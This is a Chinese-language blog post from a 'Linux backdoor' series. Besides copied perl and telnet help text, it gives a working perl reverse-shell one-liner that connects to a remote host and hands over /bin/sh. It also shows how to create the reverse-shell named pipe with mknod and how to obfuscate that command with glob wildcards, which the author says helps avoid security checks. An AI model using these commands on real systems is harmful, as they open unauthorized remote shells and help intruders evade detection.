其他
mknod | Linux 后门系列
0x01 perl
Ubuntu 16.04 自带 perl
Usage: perl [switches] [--] [programfile] [arguments]
-0[octal] specify record separator (\0, if no argument)
-a autosplit mode with -n or -p (splits $_ into @F)
-C[number/list] enables the listed Unicode features
-c check syntax only (runs BEGIN and CHECK blocks)
-d[:debugger] run program under debugger
-D[number/list] set debugging flags (argument is a bit mask or alphabets)
-e program one line of program (several -e's allowed, omit programfile)
-E program like -e, but enables all optional features
-f don't do $sitelib/sitecustomize.pl at startup
-F/pattern/ split() pattern for -a switch (//'s are optional)
-i[extension] edit <> files in place (makes backup if extension supplied)
-Idirectory specify @INC/#include directory (several -I's allowed)
-l[octal] enable line ending processing, specifies line terminator
-[mM][-]module execute "use/no module..." before executing program
-n assume "while (<>) { ... }" loop around program
-p assume loop like -n but print line also, like sed
-s enable rudimentary parsing for switches after programfile
-S look for programfile using PATH environment variable
-t enable tainting warnings
-T enable tainting checks
-u dump core after parsing program
-U allow unsafe operations
-v print version, patchlevel and license
-V[:variable] print configuration summary (or a single Config.pm variable)
-w enable many useful warnings
-W enable all warnings
-x[directory] ignore text before #!perl line (optionally cd to directory)
-X disable all warnings
perl 和 Python 在做反弹shell基本差不多,Python 那一节有点讲的太多了,大家可以对比一下参数,照着Python的思路移到 perl 上,我不太懂 perl ,这里就直接上反弹shell的命令了
-e / -E
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0x02 telnet
Ubuntu 16.04 自带 telnet
Options:
-4 Force IPv4 address resolution.
-6 Force IPv6 address resolution.
-8 Request 8-bit operation. This causes an attempt to negotiate the TELNET BINARY option for both input and output. By default telnet is not 8-bit clean.
-E Disables the escape character functionality; that is, sets the escape character to ``no character''.
-L Specifies an 8-bit data path on output. This causes the TELNET BINARY option to be negotiated on just output.
-a Attempt automatic login. Currently, this sends the user name via the USER variable of the NEW-ENVIRON option if supported by the remote system. The username is retrieved via getlogin(3).
-b address
Use bind(2) on the local socket to bind it to a specific local address.
-d Sets the initial value of the debug toggle to TRUE.
-r Emulate rlogin(1). In this mode, the default escape character is a tilde. Also, the interpretation of the escape character is changed: an escape character followed by a dot causes telnet to disconnect from the remote host. A ^Z instead of a dot suspends telnet, and a ^] (the default telnet escape character) generates a normal telnet prompt. These codes are accepted only at the beginning of a line.
-S tos Sets the IP type-of-service (TOS) option for the telnet connection to the value tos.
-e escapechar
Sets the escape character to escapechar. If no character is supplied, no escape character will be used. Entering the escape character while connected causes telnet to drop to command mode.
-l user
Specify user as the user to log in as on the remote system. This is accomplished by sending the specified name as the USER environment variable, so it requires that the remote system support the TELNET NEW-ENVIRON option. This option implies the -a option, and may also be used with the open command.
-n tracefile
Opens tracefile for recording trace information. See the set tracefile command below.
host Specifies a host to contact over the network.
port Specifies a port number or service name to contact. If not specified, the telnet port (23) is used.
telnet 反弹shell的方式和 nc 是一样的,在这里不过多描述了
在这里再添加一点之前遗漏的小东西
0x03 mknod
[+] 之前创建命名管道都是用 mkfifo ,今天我发现了一个命令 mknod ,这个命令是用来创建一个文件块,可以用来创建设备,包括以下设备:
块设备(b)
字符设备 (c)
没有缓冲的字符设备 (u)
fifo设备(p)
之前我们创建一个命名管道是 mkfifo /tmp/f
, 现在可以 mknod /tmp/f p
[+] 如果怕被安全检查, ` + * 是真好使呀
就拿上面那个为例
mknod /tmp/f p
`/*i*/m*no*/ /t*p/f p`
往期文章
Linux 后门系列之 python3 反弹shell & 隐藏后门